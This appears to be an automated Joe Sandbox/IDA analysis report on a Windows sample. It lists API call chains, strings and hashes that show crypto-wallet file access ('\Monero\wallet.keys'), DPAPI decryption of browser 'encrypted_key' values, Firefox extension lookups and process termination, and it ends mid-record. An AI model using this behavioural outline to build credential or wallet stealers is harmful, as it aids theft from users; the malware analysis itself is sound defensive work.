                                        • Instruction Fuzzy Hash: 1991DC729101089BCF14FBA4DDA2EEE7379AF65301F904569F51766092EF307A0CCBA6
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 00198CF0: GetSystemTime.KERNEL32(001A0E1B,011CA750,001A05B6,?,?,001813F9,?,0000001A,001A0E1B,00000000,?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 00198D16
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0018D901
                                        • lstrlen.KERNEL32(00000000), ref: 0018DA9F
                                        • lstrlen.KERNEL32(00000000), ref: 0018DAB3
                                        • DeleteFileA.KERNEL32(00000000), ref: 0018DB32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 8f43c870254be18dee6f3b57f4030c49181b20513fdb27c14e1b83b778371e5b
                                        • Instruction ID: 00fc0921b851639335568d15803ff856c289aa1cbe05fc1ee4e41901f59596f2
                                        • Opcode Fuzzy Hash: 8f43c870254be18dee6f3b57f4030c49181b20513fdb27c14e1b83b778371e5b
                                        • Instruction Fuzzy Hash: E481CB729101089BCF04FBA4DCA6EEE7379BF65301F904568F51766192EF346A0CCBA6
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AdjustPointer
                                        • String ID:
                                        • API String ID: 1740715915-0
                                        • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                        • Instruction ID: 6b8dfba60c6519b90ea44b5a5785c5249cfa7a1f03a9de66c8d6d6fb5a1a37a2
                                        • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                        • Instruction Fuzzy Hash: 8251D07260030AAFEB298F54C881BBA77A5FF11310F24413DEA05976D2E7B1ED52DB90
                                        APIs
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 0018A664
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocLocallstrcpy
                                        • String ID: @$v10$v20
                                        • API String ID: 2746078483-278772428
                                        • Opcode ID: 4a32572952b3d8595897cee28e6c5bed73cd606c8694a78c7f4261c6433256c9
                                        • Instruction ID: 01e6ec0100300125850a66aa0d2e440a7da3ecf828f1c2a385a93c4766ac6065
                                        • Opcode Fuzzy Hash: 4a32572952b3d8595897cee28e6c5bed73cd606c8694a78c7f4261c6433256c9
                                        • Instruction Fuzzy Hash: B2514B74A10208EFDB18EFA4CD95BED7775AF55304F808018F90A5B291EB706B09CF96
                                        APIs
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 0018A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0018A13C
                                          • Part of subcall function 0018A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0018A161
                                          • Part of subcall function 0018A110: LocalAlloc.KERNEL32(00000040,?), ref: 0018A181
                                          • Part of subcall function 0018A110: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 0018A1AA
                                          • Part of subcall function 0018A110: LocalFree.KERNEL32(0018148F), ref: 0018A1E0
                                          • Part of subcall function 0018A110: CloseHandle.KERNEL32(000000FF), ref: 0018A1EA
                                          • Part of subcall function 00198FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00198FE2
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,001A1678,001A0D93), ref: 0018F64C
                                        • lstrlen.KERNEL32(00000000), ref: 0018F66B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                        • API String ID: 998311485-3310892237
                                        • Opcode ID: dbcd648e20aaea075a2782e2d3a5634f354b4b04bb0fe48d123b98a5e57515e5
                                        • Instruction ID: 4827e3634333d40f1b9950f87bba6144487c857be855bdf7c22819247d33a350
                                        • Opcode Fuzzy Hash: dbcd648e20aaea075a2782e2d3a5634f354b4b04bb0fe48d123b98a5e57515e5
                                        • Instruction Fuzzy Hash: 6351DB76D10108ABCF04FBA4DDA6DED7379AF64300F808968F51667191EF346A0DCBA6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID:
                                        • API String ID: 367037083-0
                                        • Opcode ID: b316d4a3e805eb293fd8e86cb6beb4f45b64515a1b288af6a838d6927fa4de7f
                                        • Instruction ID: 8e68e28c3db9a5bbab2b7c59c07bb92f5aee8cfe0f0156b959ce02079139d301
                                        • Opcode Fuzzy Hash: b316d4a3e805eb293fd8e86cb6beb4f45b64515a1b288af6a838d6927fa4de7f
                                        • Instruction Fuzzy Hash: 38411C75D102099FCF04EFE4D855AEEB778AF58304F408528F52677291EB70AA48CFA6
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0018A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0018A13C
                                          • Part of subcall function 0018A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0018A161
                                          • Part of subcall function 0018A110: LocalAlloc.KERNEL32(00000040,?), ref: 0018A181
                                          • Part of subcall function 0018A110: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 0018A1AA
                                          • Part of subcall function 0018A110: LocalFree.KERNEL32(0018148F), ref: 0018A1E0
                                          • Part of subcall function 0018A110: CloseHandle.KERNEL32(000000FF), ref: 0018A1EA
                                          • Part of subcall function 00198FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00198FE2
                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0018A489
                                          • Part of subcall function 0018A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 0018A23F
                                          • Part of subcall function 0018A210: LocalAlloc.KERNEL32(00000040,?,?,?,00184F3E,00000000,?), ref: 0018A251
                                          • Part of subcall function 0018A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 0018A27A
                                          • Part of subcall function 0018A210: LocalFree.KERNEL32(?,?,?,?,00184F3E,00000000,?), ref: 0018A28F
                                          • Part of subcall function 0018A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0018A2D4
                                          • Part of subcall function 0018A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0018A2F3
                                          • Part of subcall function 0018A2B0: LocalFree.KERNEL32(?), ref: 0018A323
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                        • String ID: $"encrypted_key":"$DPAPI
                                        • API String ID: 2100535398-738592651
                                        • Opcode ID: 038170796a42b6cf6459a6eeab4deed0506f8b6d35e9d6d4efd7672329ddc332
                                        • Instruction ID: 28dedb63e0d20bed76a1cd81013eaa13ee7f08d2b8560862e4fc9dd8f93def3a
                                        • Opcode Fuzzy Hash: 038170796a42b6cf6459a6eeab4deed0506f8b6d35e9d6d4efd7672329ddc332
                                        • Instruction Fuzzy Hash: 813130B6D00208ABDF14EFE4DC45AEEB7B8BF59300F444519E902A3241E734AB45CFA2
                                        APIs
                                        • memset.MSVCRT ref: 0019967B
                                          • Part of subcall function 00198EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001996AE,00000000), ref: 00198EEB
                                          • Part of subcall function 00198EE0: RtlAllocateHeap.NTDLL(00000000), ref: 00198EF2
                                          • Part of subcall function 00198EE0: wsprintfW.USER32 ref: 00198F08
                                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 0019973B
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00199759
                                        • CloseHandle.KERNEL32(00000000), ref: 00199766
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                        • String ID:
                                        • API String ID: 3729781310-0
                                        • Opcode ID: 37c9dc476b3a71dd97e2a10d13394fe7b0f4ca881a0e3207e46fa2c71b1de505
                                        • Instruction ID: fcc114a6f18173a23768d2bb9e4bafba55d25730d4c1a2b6bbd4aecb47f5c473
                                        • Opcode Fuzzy Hash: 37c9dc476b3a71dd97e2a10d13394fe7b0f4ca881a0e3207e46fa2c71b1de505
                                        • Instruction Fuzzy Hash: B8314A71A103089BDF18DFE0DD49BEDB3B8BB54701F104468F506AB285DB74AA48CF91
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001A05BF), ref: 0019885A
                                        • Process32First.KERNEL32(?,00000128), ref: 0019886E
                                        • Process32Next.KERNEL32(?,00000128), ref: 00198883
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • CloseHandle.KERNEL32(?), ref: 001988F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                        • String ID:
                                        • API String ID: 1066202413-0
                                        • Opcode ID: a82da5766942629584f211b67b8c88f6798b8142ca82518a5a568f7a90097fd0
                                        • Instruction ID: 5fdbecc7c9a6d751238586d426c756dd7dced5348da97e791ae7af7f916dd824
                                        • Opcode Fuzzy Hash: a82da5766942629584f211b67b8c88f6798b8142ca82518a5a568f7a90097fd0
                                        • Instruction Fuzzy Hash: C7316871901218ABCF24EF95DD51FEEB378FF55700F5045A9F10AA62A1DB306A48CFA1
                                        APIs
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001FFE13
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001FFE2C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Value___vcrt_
                                        • String ID:
                                        • API String ID: 1426506684-0
                                        • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction ID: 4672c716d6ea528209e840b8e50c38489fba3f44a44ac07ddda887d951a26347
                                        • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction Fuzzy Hash: 5A01B132119729EEF73426745CC99763A95EF017B5736433EF626801F3EF924C629540
                                        APIs
                                        • CreateFileA.KERNEL32(00193D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00193D3E,?), ref: 0019948C
                                        • GetFileSizeEx.KERNEL32(000000FF,00193D3E), ref: 001994A9
                                        • CloseHandle.KERNEL32(000000FF), ref: 001994B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSize
                                        • String ID:
                                        • API String ID: 1378416451-0
                                        • Opcode ID: 58a37fd5174ddde7ba6b9a166e52a1e89218be40349f96c5f32df6c9fe524640
                                        • Instruction ID: e11a15a691db9d2adde7d2a63badf8bbcf9f59936c0d5157707f813e84d1cf98
                                        • Opcode Fuzzy Hash: 58a37fd5174ddde7ba6b9a166e52a1e89218be40349f96c5f32df6c9fe524640
                                        • Instruction Fuzzy Hash: 8CF03C39E04308BBDB14DBB4EC49F9E77B9AB48711F108668FA51A7280D674A6018F94
                                        APIs
                                        • __getptd.LIBCMT ref: 0019CA7E
                                          • Part of subcall function 0019C2A0: __amsg_exit.LIBCMT ref: 0019C2B0
                                        • __getptd.LIBCMT ref: 0019CA95
                                        • __amsg_exit.LIBCMT ref: 0019CAA3
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0019CAC7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 300741435-0
                                        • Opcode ID: 47e91e82ff7b1625aba2527c8eb6695d5a53cbe841735f5f3cc263d1b5c66c89
                                        • Instruction ID: 0056b689add7b7f92120022fa9f49672e48bad24ed6e5c2c78a2cc13508046fb
                                        • Opcode Fuzzy Hash: 47e91e82ff7b1625aba2527c8eb6695d5a53cbe841735f5f3cc263d1b5c66c89
                                        • Instruction Fuzzy Hash: BCF0B4329483189BDF20FBF8A84375E33A0AF21720F510149F485A72D2EB245D808BD5
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Catch
                                        • String ID: MOC$RCC
                                        • API String ID: 78271584-2084237596
                                        • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction ID: 7d4163ac31db5b016314554f662ed1719474f90ff1aa2d1f0fc7cadbf42add3a
                                        • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction Fuzzy Hash: 50414B7190020AAFEF15DF94DC81BAE7BB5FF48304F544159F90466292D3359960DF50
                                        APIs
                                          • Part of subcall function 00198F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00198F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 001951CA
                                        • lstrcat.KERNEL32(?,001A1058), ref: 001951E7
                                        • lstrcat.KERNEL32(?,011C91D8), ref: 001951FB
                                        • lstrcat.KERNEL32(?,001A105C), ref: 0019520D
                                          • Part of subcall function 00194B60: wsprintfA.USER32 ref: 00194B7C
                                          • Part of subcall function 00194B60: FindFirstFileA.KERNEL32(?,?), ref: 00194B93
                                          • Part of subcall function 00194B60: StrCmpCA.SHLWAPI(?,001A0FC4), ref: 00194BC1
                                          • Part of subcall function 00194B60: StrCmpCA.SHLWAPI(?,001A0FC8), ref: 00194BD7
                                          • Part of subcall function 00194B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00194DCD
                                          • Part of subcall function 00194B60: FindClose.KERNEL32(000000FF), ref: 00194DE2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
